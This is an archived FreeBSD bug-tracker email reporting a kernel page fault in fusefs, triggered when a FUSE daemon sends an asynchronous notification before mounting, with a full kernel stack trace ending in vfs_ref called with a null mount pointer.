[Bug 290519] [fusefs]: page fault triggered by asynchronous notification before mount

Reply: bugzilla-noreply_a_freebsd.org: "[Bug 290519] [fusefs]: page fault triggered by asynchronous notification before mount"
Go to: [ bottom of page ] [ top of archives ] [ this month ]
From: <bugzilla-noreply_at_freebsd.org>
Date: Sat, 25 Oct 2025 23:59:22 UTC
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=290519

            Bug ID: 290519
           Summary: [fusefs]: page fault triggered by asynchronous
                    notification before mount
           Product: Base System
           Version: 16.0-CURRENT
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Only Me
          Priority: ---
         Component: kern
          Assignee: bugs@FreeBSD.org
          Reporter: asomers@FreeBSD.org

If a FUSE daemon for some reason doesn't call nmount promptly after opening
/dev/fuse , and then sends an asynchronous notification message, a page fault
will result.  I haven't observed this behavior from any real file system, but I
can produce it with the test suite.  I also suspect that the same page fault
may be reachable after unmounting the file system, a path that is more likely
to be reachable by a real file system with a real user.

The stack trace looks like this:

#0  __curthread ()
    at /usr/home/somers/src/freebsd.org/src/sys/amd64/include/pcpu_aux.h:57
#1  doadump (textdump=textdump@entry=0)
    at /usr/home/somers/src/freebsd.org/src/sys/kern/kern_shutdown.c:399
#2  0xffffffff804ab9fa in db_dump (dummy=<optimized out>,
    dummy2=<optimized out>, dummy3=<optimized out>, dummy4=<optimized out>)
    at /usr/home/somers/src/freebsd.org/src/sys/ddb/db_command.c:596
#3  0xffffffff804ab7ed in db_command (last_cmdp=<optimized out>,
    cmd_table=<optimized out>, dopager=true)
    at /usr/home/somers/src/freebsd.org/src/sys/ddb/db_command.c:508
#4  0xffffffff804ab4ad in db_command_loop ()
    at /usr/home/somers/src/freebsd.org/src/sys/ddb/db_command.c:555
#5  0xffffffff804aeea6 in db_trap (type=<optimized out>, code=<optimized out>)
    at /usr/home/somers/src/freebsd.org/src/sys/ddb/db_main.c:267
#6  0xffffffff80bdff2f in kdb_trap (type=type@entry=3, code=code@entry=0,
    tf=tf@entry=0xfffffe00d83dc900)
    at /usr/home/somers/src/freebsd.org/src/sys/kern/subr_kdb.c:790
#7  0xffffffff810e24ee in trap (frame=<optimized out>)
    at /usr/home/somers/src/freebsd.org/src/sys/amd64/amd64/trap.c:614
#8  <signal handler called>
#9  kdb_enter (why=<optimized out>, msg=<optimized out>)
    at /usr/home/somers/src/freebsd.org/src/sys/kern/subr_kdb.c:556
#10 0xffffffff80b9068b in vpanic (fmt=0xffffffff81267110 "%s",
    ap=ap@entry=0xfffffe00d83dcb30)
    at /usr/home/somers/src/freebsd.org/src/sys/kern/kern_shutdown.c:962
#11 0xffffffff80b904f3 in panic (
    fmt=0xffffffff81d9fad0 <cnputs_mtx> "\026\226\034\201\377\377\377\377")
    at /usr/home/somers/src/freebsd.org/src/sys/kern/kern_shutdown.c:887
#12 0xffffffff810e2fdc in trap_fatal (frame=<optimized out>,
    eva=<optimized out>)
    at /usr/home/somers/src/freebsd.org/src/sys/amd64/amd64/trap.c:969
#13 0xffffffff810e2fdc in trap_pfault (frame=0xfffffe00d83dcbd0,
    usermode=false, signo=<optimized out>, ucode=<optimized out>)
#14 <signal handler called>
#15 0xffffffff80c881ff in vfs_ref (mp=mp@entry=0x0)
    at /usr/home/somers/src/freebsd.org/src/sys/kern/vfs_mount.c:530
#16 0xffffffff82a13d4a in fuse_device_write (dev=<optimized out>,
    uio=0xfffffe00d83dcda8, ioflag=<optimized out>)
    at /usr/home/somers/src/freebsd.org/src/sys/fs/fuse/fuse_device.c:555
#17 0xffffffff80a0abd3 in devfs_write_f (fp=0xfffff8001d15d230,
    uio=0xfffffe00d83dcda8, cred=<optimized out>, flags=0,
    td=0xfffff8001d144780)
    at /usr/home/somers/src/freebsd.org/src/sys/fs/devfs/devfs_vnops.c:1960
#18 0xffffffff80c0ca61 in fo_write (fp=0xfffff8001d15d230,
    uio=0xfffffe00d83dcda8,
    active_cred=0xffffffff81e5bce8 <w_locklistdata+234328>, flags=0,
    td=0xfffff8001d144780)
    at /usr/home/somers/src/freebsd.org/src/sys/sys/file.h:370
#19 dofilewrite (td=td@entry=0xfffff8001d144780, fd=fd@entry=3,
    fp=0xfffff8001d15d230, auio=auio@entry=0xfffffe00d83dcda8,
    offset=offset@entry=-1, flags=flags@entry=0)
    at /usr/home/somers/src/freebsd.org/src/sys/kern/sys_generic.c:565
#20 0xffffffff80c0c437 in kern_writev (td=0xfffff8001d144780, fd=3,
    auio=0xfffffe00d83dcda8)
    at /usr/home/somers/src/freebsd.org/src/sys/kern/sys_generic.c:492
#21 sys_write (td=0xfffff8001d144780, uap=<optimized out>)
    at /usr/home/somers/src/freebsd.org/src/sys/kern/sys_generic.c:407
#22 0xffffffff810e3989 in syscallenter (td=0xfffff8001d144780)
    at
/usr/home/somers/src/freebsd.org/src/sys/amd64/amd64/../../kern/subr_syscall.c:193
#23 amd64_syscall (td=0xfffff8001d144780, traced=0)
    at /usr/home/somers/src/freebsd.org/src/sys/amd64/amd64/trap.c:1208
#24 <signal handler called>
#25 0x00002e362005119a in ?? ()

-- 
You are receiving this mail because:
You are the assignee for the bug.